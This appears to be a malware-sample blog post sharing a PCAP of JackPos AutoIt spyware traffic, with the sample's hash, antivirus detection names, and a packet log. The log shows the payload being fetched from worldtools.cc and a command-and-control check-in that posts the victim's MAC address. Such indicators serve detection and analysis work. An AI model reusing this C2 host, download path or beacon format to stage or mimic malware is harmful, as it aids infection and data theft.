Text Example

JackPos Autoit Spyware Trojan Malware service.exe PCAP file download traffic sample

Posted on by admin

Download Attachments

  • 1 pcap service
    Date added: January 16, 2017 5:42 am Added by: admin File size: 47 KB Downloads: 83
SHA256: ac6d8abf4143abbeba5b973b684141ff8abe947f2a63384d3252c2b8b0700750
File name: sevice.exe
Detection ratio: 43 / 56
Kaspersky Trojan.Win32.Autoit.fgg 20170116
Malwarebytes Spyware.JackPos 20170116
McAfee Artemis!40C9604050E2 20170108
McAfee-GW-Edition BehavesLike.Win32.Generic.tc 20170116
eScan Trojan.GenericKD.4147639 20170116
Microsoft Trojan:Win32/Dynamer!ac 20170116
NANO-Antivirus Trojan.Win32.Autoit.ekgraq 20170116
Panda Trj/CI.A 20170115
Qihoo-360 Win32/Trojan.d80 20170116
Rising Trojan.Injector!8.C4-BSQtmSMkVWS (cloud) 20170116
Sophos Troj/Autoit-BVM 20170116
Symantec Trojan.Gen 20170115
Tencent Win32.Trojan.Autoit.Pciz 20170116
TrendMicro TROJ_OTOTI.GQA 20170116
TrendMicro-HouseCall TROJ_OTOTI.GQA 20170116
VIPRE Trojan.Win32.Generic!BT 20170116
ViRobot Trojan.Win32.S.Autoit.1534464[h]

 

2017-01-16 00:05:06.003162 IP 192.168.1.102.63152 > 193.109.68.128.80: Flags [P.], seq 0:291, ack 1, win 256, length 291: HTTP: GET /exec/sevice.exe HTTP/1.1
E..KI#@……..f.mD….P.eh.G../P…&…GET /exec/sevice.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: worldtools.cc
Connection: Keep-Alive

2017-01-16 00:05:39.211577 IP 192.168.1.102.61331 > 75.75.75.75.53: 21636+ A? worldtools.cc. (31)
E..;…….[…fKKKK…5.’..T………..
worldtools.cc…..
2017-01-16 00:05:39.344430 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [S], seq 1759156153, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4K.@….F…f.mD….Ph……… ..~…………..
2017-01-16 00:05:39.469489 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 1051522394, win 256, length 0
E..(K.@….Q…f.mD….Ph…>..ZP….:……..
2017-01-16 00:05:39.470028 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 0:48, ack 1, win 256, length 48: HTTP: GET /post/echo HTTP/1.1
E..XK.@…. …f.mD….Ph…>..ZP…X…GET /post/echo HTTP/1.1
Host: worldtools.cc

2017-01-16 00:05:39.640279 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 48:238, ack 223, win 255, length 190: HTTP: POST /post HTTP/1.1
E…K.@……..f.mD….Ph…>..8P…U…POST /post HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: worldtools.cc
Content-Length: 29
Cache-Control: no-cache

mac=00-0C-29-18-4A-91&t1=&t2=
2017-01-16 00:05:40.392086 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 443, win 254, length 0
E..(K.@….N…f.mD….Ph…>…P………….
2017-01-16 00:05:45.339491 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 444, win 254, length 0
E..(K.@….M…f.mD….Ph…>…P………….

Leave a Reply